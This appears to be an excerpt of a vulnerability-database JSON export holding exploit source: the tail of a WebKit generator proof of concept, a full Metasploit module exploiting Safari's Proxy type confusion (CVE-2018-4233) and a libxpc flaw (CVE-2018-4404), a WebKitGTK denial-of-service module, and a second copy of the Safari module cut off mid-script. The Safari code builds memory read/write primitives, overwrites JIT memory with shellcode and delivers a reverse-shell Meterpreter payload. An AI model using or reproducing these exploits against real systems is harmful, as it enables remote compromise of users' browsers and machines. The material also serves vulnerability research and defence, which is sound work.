}\r\n yield index++;\r\n //print(\"bval\" + b[0]);\r\n }\r\n}\r\n\r\nfunction* foo2(){\r\n\r\n yield;\r\n\r\n}\r\n\r\nvar temp = 
foo2(0);\r\n\r\nfor(var i = 0; i < 10; i++){\r\n\r\n\tvar q = {};\r\n\tq.__proto__ = temp;\r\n\tq.next();\r\n\tq.__proto__ = {};\r\n\ta.push(q);\r\n\r\n}\r\n//print(a);\r\niterator = foo(0);\r\n\r\n\r\n// expected output: 0\r\n\r\n\r\n\r\n\r\no.__proto__ = iterator;\r\n//print(\"FIRST CALL\")\r\n//print(o.next().value);\r\n//print(\"SECOND CALL\")\r\n//print(o.next().value);\r\n//print(\"THIRD CALL\")\r\n\r\nfor(var i = 0; i < 10; i++){\r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next(\"hello\").value);\r\n}\r\n\r\n//print(\"FOURTH CALL\")\r\n//print(iterator.next().value);\r\no();\r\n</script></body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44861/"}, {"lastseen": "2018-12-16T01:04:15", "description": "", "published": "2018-12-14T00:00:00", "type": "exploitdb", "title": "Safari - Proxy Object Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4404", "CVE-2018-4233"], "modified": "2018-12-14T00:00:00", "id": "EDB-ID:45998", "href": "https://www.exploit-db.com/exploits/45998", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari Proxy Object Type Confusion',\r\n 'Description' => %q{\r\n This module exploits a type confusion bug in the Javascript Proxy object in\r\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\r\n it is possible to run arbitrary JS code during the execution of a CreateThis\r\n operation. This makes it possible to change the structure of e.g. 
an argument\r\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\r\n\r\n The JIT region is then replaced with shellcode which loads the second stage.\r\n The second stage exploits a logic error in libxpc, which uses command execution\r\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'saelo' ],\r\n 'References' => [\r\n ['CVE', '2018-4233'],\r\n ['CVE', '2018-4404'],\r\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\r\n ['URL', 'https://github.com/saelo/pwn2own2018'],\r\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\r\n ],\r\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\r\n 'Platform' => 'osx',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\r\n 'Targets' => [\r\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\r\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\r\n ],\r\n 'DisclosureDate' => 'Mar 15 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\r\n ])\r\n end\r\n\r\n def offset_table\r\n {\r\n '10.12.6' => {\r\n :jsc_vtab => '0x0000d8d8',\r\n :dyld_stub_loader => '0x00001168',\r\n :dlopen => '0x000027f7',\r\n :confstr => '0x00002c84',\r\n :strlen => '0x00001b40',\r\n :strlen_got => '0xdc0',\r\n },\r\n '10.13' => {\r\n :jsc_vtab => '0x0000e5f8',\r\n :dyld_stub_loader => '0x000012a8',\r\n :dlopen => '0x00002e60',\r\n :confstr => '0x000024fc',\r\n :strlen => '0x00001440',\r\n :strlen_got => '0xee8',\r\n },\r\n '10.13.3' => {\r\n :jsc_vtab => '0xe5e8',\r\n :dyld_stub_loader => '0x1278',\r\n :dlopen => '0x2e30',\r\n :confstr => '0x24dc',\r\n :strlen => '0x1420',\r\n :strlen_got => '0xee0',\r\n },\r\n }\r\n end\r\n\r\n def exploit_data(directory, file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 
directory, file\r\n ::File.binread path\r\n end\r\n\r\n def stage1_js\r\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\r\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\r\n end\r\n\r\n def stage2_js\r\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\r\n payload_cmd = payload.raw\r\n if target['Arch'] == ARCH_PYTHON\r\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\r\n end\r\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\r\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\r\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\r\n end\r\n\r\n def get_offsets(user_agent)\r\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\r\n version = $1.gsub(\"_\", \".\")\r\n mac_osx_version = Gem::Version.new(version)\r\n if mac_osx_version >= Gem::Version.new('10.13.4')\r\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\r\n elsif mac_osx_version < Gem::Version.new('10.12')\r\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\r\n elsif offset_table.key?(version)\r\n offset = offset_table[version]\r\n return <<-EOF\r\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\r\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\r\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\r\nconst CONFSTR_OFFSET = #{offset[:confstr]};\r\nconst STRLEN_OFFSET = #{offset[:strlen]};\r\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\r\nEOF\r\n else\r\n print_warning \"No offsets for version #{mac_osx_version}\"\r\n end\r\n else\r\n print_warning \"Unexpected User-Agent\"\r\n end\r\n return false\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n user_agent = request['User-Agent']\r\n print_status(\"Request from #{user_agent}\")\r\n offsets = get_offsets(user_agent)\r\n unless offsets\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\r\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\r\n html = 
%Q^\r\n<html>\r\n<body>\r\n<script>\r\n#{stage1_js}\r\nstage1.replace = function(oldVal, newVal) {\r\n for (var idx = 0; idx < this.length; idx++) {\r\n var found = true;\r\n for (var j = idx; j < idx + 8; j++) {\r\n if (this[j] != oldVal.byteAt(j - idx)) {\r\n found = false;\r\n break;\r\n }\r\n }\r\n if (found)\r\n break;\r\n }\r\n this.set(newVal.bytes(), idx);\r\n};\r\n#{stage2_js}\r\n#{utils}\r\n#{int64}\r\n#{offsets}\r\n\r\nvar ready = new Promise(function(resolve) {\r\n if (typeof(window) === 'undefined')\r\n resolve();\r\n else\r\n window.onload = function() {\r\n resolve();\r\n }\r\n});\r\n\r\nready = Promise.all([ready]);\r\n\r\nprint = function(msg) {\r\n //console.log(msg);\r\n //document.body.innerText += msg + '\\\\n';\r\n}\r\n\r\n// Must create this indexing type transition first,\r\n// otherwise the JIT will deoptimize later.\r\nvar a = [13.37, 13.37];\r\na[0] = {};\r\n\r\nvar referenceFloat64Array = new Float64Array(0x1000);\r\n\r\n//\r\n// Bug: the DFG JIT does not take into account that, through the use of a\r\n// Proxy, it is possible to run arbitrary JS code during the execution of a\r\n// CreateThis operation. 
This makes it possible to change the structure of e.g.\r\n// an argument without causing a bailout, leading to a type confusion.\r\n//\r\n\r\n//\r\n// addrof primitive\r\n//\r\nfunction setupAddrof() {\r\n function InfoLeaker(a) {\r\n this.address = a[0];\r\n }\r\n\r\n var trigger = false;\r\n var leakme = null;\r\n var arg = null;\r\n\r\n var handler = {\r\n get(target, propname) {\r\n if (trigger)\r\n arg[0] = leakme;\r\n return target[propname];\r\n },\r\n };\r\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\r\n\r\n for (var i = 0; i < 100000; i++) {\r\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\r\n }\r\n\r\n trigger = true;\r\n\r\n return function(obj) {\r\n leakme = obj;\r\n arg = [1.1, 1.1];\r\n var o = new InfoLeakerProxy(arg);\r\n return o.address;\r\n };\r\n}\r\n\r\n//\r\n// fakeobj primitive\r\n//\r\nfunction setupFakeobj() {\r\n function ObjFaker(a, address) {\r\n a[0] = address;\r\n }\r\n\r\n var trigger = false;\r\n var arg = null;\r\n\r\n var handler = {\r\n get(target, propname) {\r\n if (trigger)\r\n arg[0] = {};\r\n return target[propname];\r\n },\r\n };\r\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\r\n\r\n for (var i = 0; i < 100000; i++) {\r\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\r\n }\r\n\r\n trigger = true;\r\n\r\n return function(address) {\r\n arg = [1.1, 1.1];\r\n var o = new ObjFakerProxy(arg, address);\r\n return arg[0];\r\n };\r\n}\r\n\r\nfunction makeJITCompiledFunction() {\r\n // Some code to avoid inlining...\r\n function target(num) {\r\n for (var i = 2; i < num; i++) {\r\n if (num % i === 0) {\r\n return false;\r\n }\r\n }\r\n return true;\r\n }\r\n\r\n // Force JIT compilation.\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n return target;\r\n}\r\n\r\nfunction pwn() {\r\n // Spray Float64Array structures so that structure ID 0x1000 will\r\n // be a Float64Array with very high 
probability\r\n var structs = [];\r\n for (var i = 0; i < 0x1000; i++) {\r\n var a = new Float64Array(1);\r\n a['prop' + i] = 1337;\r\n structs.push(a);\r\n }\r\n\r\n // Setup exploit primitives\r\n var addrofOnce = setupAddrof();\r\n var fakeobjOnce = setupFakeobj();\r\n\r\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\r\n /*\r\n var stuff = [];\r\n for (var i = 0; i < 0x100000; i++) {\r\n stuff.push({foo: i});\r\n }\r\n */\r\n\r\n var float64MemView = new Float64Array(0x200);\r\n var uint8MemView = new Uint8Array(0x1000);\r\n\r\n // Setup container to host the fake Float64Array\r\n var jsCellHeader = new Int64([\r\n 00, 0x10, 00, 00, // m_structureID\r\n 0x0, // m_indexingType\r\n 0x2b, // m_type\r\n 0x08, // m_flags\r\n 0x1 // m_cellState\r\n ]);\r\n\r\n var container = {\r\n jsCellHeader: jsCellHeader.asJSValue(),\r\n butterfly: null,\r\n vector: float64MemView,\r\n length: (new Int64('0x0001000000001337')).asJSValue(),\r\n mode: {}, // an empty object, we'll need that later\r\n };\r\n\r\n // Leak address and inject fake object\r\n // RawAddr == address in float64 form\r\n var containerRawAddr = addrofOnce(container);\r\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\r\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\r\n\r\n ///\r\n /// BEGIN CRITICAL SECTION\r\n ///\r\n /// Objects are corrupted, a GC would now crash the process.\r\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\r\n ///\r\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\r\n while (!(driver instanceof Float64Array)) {\r\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\r\n container.jsCellHeader = jsCellHeader.asJSValue();\r\n }\r\n\r\n // Get some addresses that we'll need to repair our objects. 
We'll abuse the .mode\r\n // property of the container to leak addresses.\r\n driver[2] = containerRawAddr;\r\n var emptyObjectRawAddr = float64MemView[6];\r\n container.mode = referenceFloat64Array;\r\n var referenceFloat64ArrayRawAddr = float64MemView[6];\r\n\r\n // Fixup the JSCell header of the container to make it look like an empty object.\r\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\r\n driver[2] = emptyObjectRawAddr;\r\n var header = float64MemView[0];\r\n driver[2] = containerRawAddr;\r\n float64MemView[0] = header;\r\n\r\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\r\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\r\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\r\n driver[2] = referenceFloat64ArrayRawAddr;\r\n var header = float64MemView[0];\r\n var length = float64MemView[3];\r\n var mode = float64MemView[4];\r\n driver[2] = containerRawAddr;\r\n float64MemView[2] = header;\r\n float64MemView[3] = 0;\r\n float64MemView[5] = length;\r\n float64MemView[6] = mode;\r\n\r\n // Root the container object so it isn't garbage collected.\r\n // This will allocate a butterfly for the fake object and store a reference to the container there.\r\n // The fake array itself is rooted by the memory object (closures).\r\n driver.container = container;\r\n\r\n ///\r\n /// END CRITICAL SECTION\r\n ///\r\n /// Objects are repaired, we will now survive a GC\r\n ///\r\n if (typeof(gc) !== 'undefined')\r\n gc();\r\n\r\n memory = {\r\n read: function(addr, length) {\r\n driver[2] = memory.addrof(uint8MemView).asDouble();\r\n float64MemView[2] = addr.asDouble();\r\n var a = new Array(length);\r\n for (var i = 0; i < length; i++)\r\n a[i] = uint8MemView[i];\r\n return a;\r\n },\r\n\r\n write: function(addr, data) {\r\n driver[2] = memory.addrof(uint8MemView).asDouble();\r\n float64MemView[2] = addr.asDouble();\r\n for (var i = 0; i < 
data.length; i++)\r\n uint8MemView[i] = data[i];\r\n },\r\n\r\n read8: function(addr) {\r\n driver[2] = addr.asDouble();\r\n return Int64.fromDouble(float64MemView[0]);\r\n },\r\n\r\n write8: function(addr, value) {\r\n driver[2] = addr.asDouble();\r\n float64MemView[0] = value.asDouble();\r\n },\r\n\r\n addrof: function(obj) {\r\n float64MemView.leakme = obj;\r\n var butterfly = Int64.fromDouble(driver[1]);\r\n return memory.read8(Sub(butterfly, 0x10));\r\n },\r\n };\r\n\r\n print(\"[+] Got stable memory read/write!\");\r\n\r\n // Find binary base\r\n var funcAddr = memory.addrof(Math.sin);\r\n var executableAddr = memory.read8(Add(funcAddr, 24));\r\n var codeAddr = memory.read8(Add(executableAddr, 24));\r\n var vtabAddr = memory.read8(codeAddr);\r\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\r\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\r\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\r\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\r\n\r\n var dyldStubLoaderAddr = memory.read8(jscBase);\r\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\r\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\r\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\r\n print(\"[*] dyld.dylib @ \" + dyldBase);\r\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\r\n\r\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\r\n print(\"[*] confstr @ \" + confstrAddr);\r\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\r\n print(\"[*] dlopen @ \" + dlopenAddr);\r\n\r\n // Patching shellcode\r\n var stage2Addr = memory.addrof(stage2);\r\n stage2Addr = memory.read8(Add(stage2Addr, 16));\r\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\r\n\r\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\r\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\r\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\r\n stage1.replace(new Int64(\"0x4444444444444444\"), 
dlopenAddr);\r\n print(\"[+] Shellcode patched\");\r\n\r\n // Leak JITCode pointer poison value\r\n var poison_addr = Add(jscBase, 305152);\r\n print(\"[*] Poison value @ \" + poison_addr);\r\n var poison = memory.read8(poison_addr);\r\n print(\"[*] Poison value: \" + poison);\r\n\r\n // Shellcode\r\n var func = makeJITCompiledFunction();\r\n var funcAddr = memory.addrof(func);\r\n print(\"[+] Shellcode function object @ \" + funcAddr);\r\n var executableAddr = memory.read8(Add(funcAddr, 24));\r\n print(\"[+] Executable instance @ \" + executableAddr);\r\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\r\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\r\n\r\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\r\n var codeAddr = Xor(codeAddrPoisoned, poison);\r\n print(\"[+] RWX memory @ \" + codeAddr.toString());\r\n print(\"[+] Writing shellcode...\");\r\n var origCode = memory.read(codeAddr, stage1.length);\r\n memory.write(codeAddr, stage1);\r\n\r\n print(\"[!] Jumping into shellcode...\");\r\n var res = func();\r\n if (res === 0) {\r\n print(\"[+] Shellcode executed sucessfully!\");\r\n } else {\r\n print(\"[-] Shellcode failed to execute: error \" + res);\r\n }\r\n\r\n memory.write(codeAddr, origCode);\r\n print(\"[*] Restored previous JIT code\");\r\n\r\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\r\n if (typeof(gc) !== 'undefined')\r\n gc();\r\n}\r\n\r\nready.then(function() {\r\n try {\r\n pwn();\r\n } catch (e) {\r\n print(\"[-] Exception caught: \" + e);\r\n }\r\n}).catch(function(err) {\r\n print(\"[-] Initializatin failed\");\r\n});\r\n\r\n</script>\r\n</body>\r\n</html>\r\n ^\r\n unless datastore['DEBUG_EXPLOIT']\r\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 
"https://www.exploit-db.com/download/45998"}], "metasploit": [{"lastseen": "2020-10-09T18:28:49", "description": "This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it could lead to application crash, resulting in denial of service.\n", "published": "2018-06-09T06:13:47", "type": "metasploit", "title": "WebKitGTK+ WebKitFaviconDatabase DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/DOS/HTTP/WEBKITPLUS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\",\n 'Description' => %q(\n This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Dhiraj Mishra', # Original discovery, disclosure\n 'Hardik Mehta', # Original discovery, disclosure\n 'Zubin Devnani', # Original discovery, disclosure\n 'Manuel Caballero' #JS Code\n ],\n 'References' => [\n ['EDB', '44842'],\n ['CVE', '2018-11646'],\n ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],\n ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']\n ],\n 'DisclosureDate' => '2018-06-03',\n 'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],\n 'PassiveActions' => [ 'WebServer' ],\n 'DefaultAction' => 'WebServer'\n )\n )\n end\n\n def run\n exploit # start http server\n end\n\n def setup\n @html = <<-JS\n<script type=\"text/javascript\">\n win = window.open(\"WIN\", \"WIN\");\n window.open(\"http://example.com/\", \"WIN\");\n 
win.document.execCommand('stop');\n win.document.write(\"HelloWorld\");\n win.document.close();\n</script>\n JS\n end\n\n def on_request_uri(cli, _request)\n print_status('Sending response')\n send_response(cli, @html)\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/webkitplus.rb"}, {"lastseen": "2020-10-14T01:51:02", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The JIT region is then replaced with shellcode which loads the second stage. The second stage exploits a logic error in libxpc, which uses command execution via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n", "published": "2018-11-15T00:44:18", "type": "metasploit", "title": "Safari Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4233", "CVE-2018-4404"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. 
The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The JIT region is then replaced with shellcode which loads the second stage.\n The second stage exploits a logic error in libxpc, which uses command execution\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'saelo' ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2018-4404'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/saelo/pwn2own2018'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ],\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\n 'Platform' => 'osx',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\n 'Targets' => [\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\n ],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n ])\n end\n\n def offset_table\n {\n '10.12.6' => {\n :jsc_vtab => '0x0000d8d8',\n :dyld_stub_loader => '0x00001168',\n :dlopen => '0x000027f7',\n :confstr => '0x00002c84',\n :strlen => '0x00001b40',\n :strlen_got => '0xdc0',\n },\n '10.13' => {\n :jsc_vtab => '0x0000e5f8',\n :dyld_stub_loader => '0x000012a8',\n :dlopen => '0x00002e60',\n :confstr => '0x000024fc',\n :strlen => '0x00001440',\n :strlen_got => '0xee8',\n },\n '10.13.3' => {\n :jsc_vtab => '0xe5e8',\n :dyld_stub_loader => '0x1278',\n :dlopen => '0x2e30',\n :confstr => '0x24dc',\n :strlen => '0x1420',\n :strlen_got => '0xee0',\n },\n }\n end\n\n def 
stage1_js\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\n end\n\n def stage2_js\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\n payload_cmd = payload.raw\n if target['Arch'] == ARCH_PYTHON\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\n end\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\n end\n\n def get_offsets(user_agent)\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\n osx_version = $1.gsub(\"_\", \".\")\n if user_agent =~ /Version\\/(.*?) /\n if Gem::Version.new($1) >= Gem::Version.new('11.1.1')\n print_warning \"Safari version #{$1} is not vulnerable\"\n return false\n else\n print_good \"Safari version #{$1} appears to be vulnerable\"\n end\n end\n mac_osx_version = Gem::Version.new(osx_version)\n if mac_osx_version >= Gem::Version.new('10.13.4')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Gem::Version.new('10.12')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif offset_table.key?(osx_version)\n offset = offset_table[osx_version]\n return <<-EOF\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\nconst CONFSTR_OFFSET = #{offset[:confstr]};\nconst STRLEN_OFFSET = #{offset[:strlen]};\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\nEOF\n else\n print_warning \"No offsets for version #{mac_osx_version}\"\n end\n else\n print_warning \"Unexpected User-Agent\"\n end\n return false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request from #{user_agent}\")\n offsets = get_offsets(user_agent)\n unless offsets\n send_not_found(cli)\n return\n end\n\n utils = exploit_data 
\"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n html = %Q^\n<html>\n<body>\n<script>\n#{stage1_js}\nstage1.replace = function(oldVal, newVal) {\n for (var idx = 0; idx < this.length; idx++) {\n var found = true;\n for (var j = idx; j < idx + 8; j++) {\n if (this[j] != oldVal.byteAt(j - idx)) {\n found = false;\n break;\n }\n }\n if (found)\n break;\n }\n this.set(newVal.bytes(), idx);\n};\n#{stage2_js}\n#{utils}\n#{int64}\n#{offsets}\n\nvar ready = new Promise(function(resolve) {\n if (typeof(window) === 'undefined')\n resolve();\n else\n window.onload = function() {\n resolve();\n }\n});\n\nready = Promise.all([ready]);\n\nprint = function(msg) {\n //console.log(msg);\n //document.body.innerText += msg + '\\\\n';\n}\n\n// Must create this indexing type transition first,\n// otherwise the JIT will deoptimize later.\nvar a = [13.37, 13.37];\na[0] = {};\n\nvar referenceFloat64Array = new Float64Array(0x1000);\n\n//\n// Bug: the DFG JIT does not take into account that, through the use of a\n// Proxy, it is possible to run arbitrary JS code during the execution of a\n// CreateThis operation. 
This makes it possible to change the structure of e.g.\n// an argument without causing a bailout, leading to a type confusion.\n//\n\n//\n// addrof primitive\n//\nfunction setupAddrof() {\n function InfoLeaker(a) {\n this.address = a[0];\n }\n\n var trigger = false;\n var leakme = null;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = leakme;\n return target[propname];\n },\n };\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\n }\n\n trigger = true;\n\n return function(obj) {\n leakme = obj;\n arg = [1.1, 1.1];\n var o = new InfoLeakerProxy(arg);\n return o.address;\n };\n}\n\n//\n// fakeobj primitive\n//\nfunction setupFakeobj() {\n function ObjFaker(a, address) {\n a[0] = address;\n }\n\n var trigger = false;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = {};\n return target[propname];\n },\n };\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\n }\n\n trigger = true;\n\n return function(address) {\n arg = [1.1, 1.1];\n var o = new ObjFakerProxy(arg, address);\n return arg[0];\n };\n}\n\nfunction makeJITCompiledFunction() {\n // Some code to avoid inlining...\n function target(num) {\n for (var i = 2; i < num; i++) {\n if (num % i === 0) {\n return false;\n }\n }\n return true;\n }\n\n // Force JIT compilation.\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n return target;\n}\n\nfunction pwn() {\n // Spray Float64Array structures so that structure ID 0x1000 will\n // be a Float64Array with very high probability\n var structs = [];\n for (var i = 0; i < 0x1000; i++) {\n var a = new Float64Array(1);\n a['prop' + i] = 1337;\n structs.push(a);\n }\n\n // Setup exploit primitives\n var addrofOnce = 
setupAddrof();\n var fakeobjOnce = setupFakeobj();\n\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\n /*\n var stuff = [];\n for (var i = 0; i < 0x100000; i++) {\n stuff.push({foo: i});\n }\n */\n\n var float64MemView = new Float64Array(0x200);\n var uint8MemView = new Uint8Array(0x1000);\n\n // Setup container to host the fake Float64Array\n var jsCellHeader = new Int64([\n 00, 0x10, 00, 00, // m_structureID\n 0x0, // m_indexingType\n 0x2b, // m_type\n 0x08, // m_flags\n 0x1 // m_cellState\n ]);\n\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: null,\n vector: float64MemView,\n length: (new Int64('0x0001000000001337')).asJSValue(),\n mode: {}, // an empty object, we'll need that later\n };\n\n // Leak address and inject fake object\n // RawAddr == address in float64 form\n var containerRawAddr = addrofOnce(container);\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\n\n ///\n /// BEGIN CRITICAL 